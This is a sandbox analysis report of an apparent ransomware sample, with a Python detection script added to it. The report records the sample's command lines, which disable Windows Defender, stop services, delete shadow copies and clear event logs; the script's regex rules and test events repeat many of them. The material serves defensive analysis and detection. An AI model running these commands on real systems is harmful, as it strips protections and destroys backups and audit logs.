| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
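The command lines above are the sample's pre-encryption tampering: Windows Defender disabled through schtasks, reg (Start=4 is SERVICE_DISABLED), MpCmdRun -RemoveDefinitions and Set-MpPreference, shadow copies removed with vssadmin and wmic, and the System/Security/Application logs cleared with wevtutil. The following detection logic is an added example written for this page, not code from the sandbox or from the sample: it maps each recorded command line to its ATT&CK technique (T1562.001, T1490, T1070.001) and correlates hits per process tree, since a single wevtutil cl or vssadmin delete is routine admin activity while a burst spanning several techniques under one parent is not. Event fields are modelled on Sysmon Event ID 1 (ProcessId, ParentProcessId, Image, CommandLine); the PIDs, the sample.exe root event and the benign admin commands are constructed, the malicious command lines are copied from the report.

```python
"""Map recorded command lines to ATT&CK techniques and correlate hits per
process tree. Added example for this report, not sandbox or sample code.
Events are constructed in the shape of Sysmon Event ID 1 fields; PIDs are
made up and no live telemetry is read."""
import re
from collections import defaultdict
from dataclasses import dataclass

# (technique, label, pattern). Each pattern pins the verb AND the harmful
# argument, so the /Enable, 'list shadows', Start=2 and $false variants an
# admin legitimately runs do not fire.
RULES = [
    ("T1562.001", "Defender/ExploitGuard scheduled task disabled",
     r'schtasks(?:\.exe)?\s+/change\s+/tn\s+"[^"]*(?:windows defender|exploitguard)[^"]*"\s+/disable'),
    ("T1562.001", "Defender autorun entry deleted",
     r'reg(?:\.exe)?\s+delete\s+"[^"]*\\run"\s+/v\s+"windows ?defender"'),
    ("T1562.001", "Defender EPP context-menu handler deleted",
     r'reg(?:\.exe)?\s+delete\s+"hkcr\\[^"]*\\shellex\\contextmenuhandlers\\epp"'),
    ("T1562.001", "Defender service/driver Start=4 (SERVICE_DISABLED)",
     r'reg(?:\.exe)?\s+add\s+"hklm\\system\\currentcontrolset\\services\\'
     r'(?:wdboot|wdfilter|wdnisdrv|wdnissvc|windefend|securityhealthservice)"'
     r'\s+/v\s+"?start"?\s+/t\s+reg_dword\s+/d\s+"?4"?'),
    ("T1562.001", "Defender definitions removed",
     r'mpcmdrun(?:\.exe)?"?\s+-removedefinitions'),
    ("T1562.001", "Set-MpPreference protection switch disabled",
     r'set-mppreference\b.*-disable\w+\s+\$true\b'),
    ("T1490", "vssadmin shadow copies deleted",
     r'vssadmin(?:\.exe)?\s+delete\s+shadows'),
    ("T1490", "wmic shadow copies deleted",
     r'wmic(?:\.exe)?\s+shadowcopy\s+delete'),
    ("T1070.001", "Windows event log cleared",
     r'wevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+\S+'),
]
COMPILED = [(t, l, re.compile(p, re.I)) for t, l, p in RULES]


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def classify(cmdline: str):
    """Return (technique, label) of the first matching rule, or None."""
    for tech, label, rx in COMPILED:
        if rx.search(cmdline):
            return tech, label
    return None


def root_pid(pid: int, parent_of: dict) -> int:
    """Walk ParentProcessId links to the top-most process we hold an event for,
    so 'cmd.exe /c powershell ...' children land in the same tree as the sample."""
    seen = set()
    while pid not in seen and parent_of.get(pid) in parent_of:
        seen.add(pid)
        pid = parent_of[pid]
    return pid


def correlate(events, min_distinct: int = 2) -> dict:
    """Group rule hits per process tree; keep trees whose hits cover at least
    `min_distinct` ATT&CK techniques (one lone 'wevtutil cl' is not enough)."""
    parent_of = {e.pid: e.ppid for e in events}
    trees = defaultdict(lambda: {"techniques": set(), "hits": []})
    for e in events:
        hit = classify(e.cmdline)
        if hit is None:
            continue
        tree = trees[root_pid(e.pid, parent_of)]
        tree["techniques"].add(hit[0])
        tree["hits"].append((e.pid, hit[0], hit[1], e.cmdline))
    return {r: t for r, t in trees.items() if len(t["techniques"]) >= min_distinct}


SAMPLE_PID = 3000  # constructed PID for the detonated sample
EVENTS = [
    ProcEvent(SAMPLE_PID, 2999, r"C:\Users\Admin\AppData\Local\Temp\sample.exe", "sample.exe"),
    # Command lines below are those recorded in the report; PIDs are constructed.
    ProcEvent(3001, SAMPLE_PID, r"C:\Windows\SysWOW64\schtasks.exe",
              r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'),
    ProcEvent(3002, SAMPLE_PID, r"C:\Windows\SysWOW64\reg.exe",
              r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'),
    ProcEvent(3003, SAMPLE_PID, r"C:\Windows\SysWOW64\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent(3004, SAMPLE_PID, r"C:\Windows\SysWOW64\wevtutil.exe", "wevtutil.exe cl security"),
    ProcEvent(3005, SAMPLE_PID, r"C:\Windows\SysWOW64\cmd.exe",
              r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    ProcEvent(3006, 3005, r"C:\Program Files\Windows Defender\MpCmdRun.exe",
              r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    ProcEvent(3007, SAMPLE_PID, r"C:\Windows\SysWOW64\cmd.exe",
              "cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(3008, 3007, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    # Constructed admin session with benign look-alikes: none of these should fire.
    ProcEvent(4001, 4000, r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe list shadows"),
    ProcEvent(4002, 4000, r"C:\Windows\System32\reg.exe",
              r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "2" /f'),
    ProcEvent(4003, 4000, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Enable'),
    ProcEvent(4004, 4000, r"C:\Windows\System32\wbem\wmic.exe", "wmic.exe SHADOWCOPY /nointeractive"),
    ProcEvent(4005, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Set-MpPreference -DisableRealtimeMonitoring $false"),
]

if __name__ == "__main__":
    for root, tree in correlate(EVENTS).items():
        print(f"root PID {root}: {sorted(tree['techniques'])}, {len(tree['hits'])} hits")
        for pid, tech, label, cmd in tree["hits"]:
            print(f"  {pid} {tech} {label}: {cmd}")
```

Two design points. The cmd.exe wrapper and the child it spawns (MpCmdRun, powershell) both match, so hits are counted twice per chain; the per-tree technique set, not the hit count, drives the verdict. The bare `wmic.exe SHADOWCOPY /nointeractive` invocation recorded above carries no delete verb and is deliberately not matched; only `shadowcopy delete` is, which keeps a user merely opening the wmic shadowcopy alias out of the alert.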
Network
Files
memory/520-54-0x0000000000000000-mapping.dmp
memory/560-55-0x0000000000000000-mapping.dmp
memory/1736-56-0x0000000000000000-mapping.dmp
memory/1480-57-0x0000000000000000-mapping.dmp
memory/1344-58-0x0000000000000000-mapping.dmp
memory/364-59-0x0000000000000000-mapping.dmp
memory/1188-60-0x0000000000000000-mapping.dmp
memory/1576-61-0x0000000000000000-mapping.dmp
memory/1380-62-0x0000000000000000-mapping.dmp
memory/624-63-0x0000000000000000-mapping.dmp
memory/1584-64-0x0000000000000000-mapping.dmp
memory/1624-65-0x0000000000000000-mapping.dmp
memory/1124-66-0x0000000000000000-mapping.dmp
memory/992-67-0x0000000000000000-mapping.dmp
memory/1588-68-0x0000000000000000-mapping.dmp
memory/1448-69-0x0000000000000000-mapping.dmp
memory/1672-70-0x0000000000000000-mapping.dmp
memory/1952-71-0x0000000000000000-mapping.dmp
memory/688-72-0x0000000000000000-mapping.dmp
memory/728-73-0x0000000000000000-mapping.dmp
memory/1648-74-0x0000000000000000-mapping.dmp
memory/1752-75-0x0000000000000000-mapping.dmp
memory/1664-76-0x0000000000000000-mapping.dmp
memory/1660-77-0x0000000000000000-mapping.dmp
memory/596-78-0x0000000000000000-mapping.dmp
memory/1860-79-0x0000000000000000-mapping.dmp
memory/1824-80-0x0000000000000000-mapping.dmp
memory/1136-81-0x0000000000000000-mapping.dmp
memory/304-82-0x0000000000000000-mapping.dmp
memory/2028-83-0x0000000000000000-mapping.dmp
memory/1624-84-0x0000000000000000-mapping.dmp
memory/1400-85-0x0000000000000000-mapping.dmp
memory/1872-86-0x0000000000000000-mapping.dmp
memory/1212-87-0x0000000000000000-mapping.dmp
memory/544-88-0x0000000000000000-mapping.dmp
memory/1968-89-0x0000000000000000-mapping.dmp
memory/1944-90-0x0000000000000000-mapping.dmp
memory/1504-91-0x0000000000000000-mapping.dmp
memory/1152-92-0x0000000000000000-mapping.dmp
memory/268-93-0x0000000000000000-mapping.dmp
memory/1724-94-0x0000000000000000-mapping.dmp
memory/696-95-0x0000000000000000-mapping.dmp
memory/1000-96-0x0000000000000000-mapping.dmp
memory/1868-97-0x0000000000000000-mapping.dmp
memory/988-98-0x0000000000000000-mapping.dmp
memory/1708-99-0x0000000000000000-mapping.dmp
memory/1960-100-0x0000000000000000-mapping.dmp
memory/1988-101-0x0000000000000000-mapping.dmp
memory/1700-102-0x0000000000000000-mapping.dmp
memory/1580-103-0x0000000000000000-mapping.dmp
memory/856-104-0x0000000000000000-mapping.dmp
memory/1044-105-0x0000000000000000-mapping.dmp
memory/836-106-0x0000000000000000-mapping.dmp
memory/1360-107-0x0000000000000000-mapping.dmp
memory/932-108-0x0000000000000000-mapping.dmp
memory/336-109-0x0000000000000000-mapping.dmp
memory/1696-110-0x0000000000000000-mapping.dmp
memory/1480-111-0x0000000000000000-mapping.dmp
memory/1788-112-0x0000000000000000-mapping.dmp
memory/1796-113-0x0000000000000000-mapping.dmp
memory/892-114-0x0000000000000000-mapping.dmp
memory/624-115-0x0000000000000000-mapping.dmp
memory/920-116-0x0000000000000000-mapping.dmp
memory/2060-117-0x0000000000000000-mapping.dmp
memory/2116-118-0x0000000075471000-0x0000000075473000-memory.dmp
memory/2116-119-0x0000000002480000-0x00000000030CA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | b05da822fc672cfdb7dee30f2f87afd6 |
| SHA1 | 2e0a89ebf40b8a0b593026d8eec01501e1588a29 |
| SHA256 | fc37f4dc8be0b59d230abbde1141dbdc3d8f4de03796144d871435bdc14e54ce |
| SHA512 | 8359f7eed082fba1dc1d57167dab12dfaa225cc30073e99a31bd9c0fb267a12b0590ab3cf26b3d140e7f6ad8d190151c265b4a17d406e4766dc3031116ccff79 |
memory/2192-122-0x00000000022B0000-0x00000000022B1000-memory.dmp
memory/2192-123-0x00000000022B1000-0x00000000022B2000-memory.dmp
memory/2192-124-0x00000000022B2000-0x00000000022B4000-memory.dmp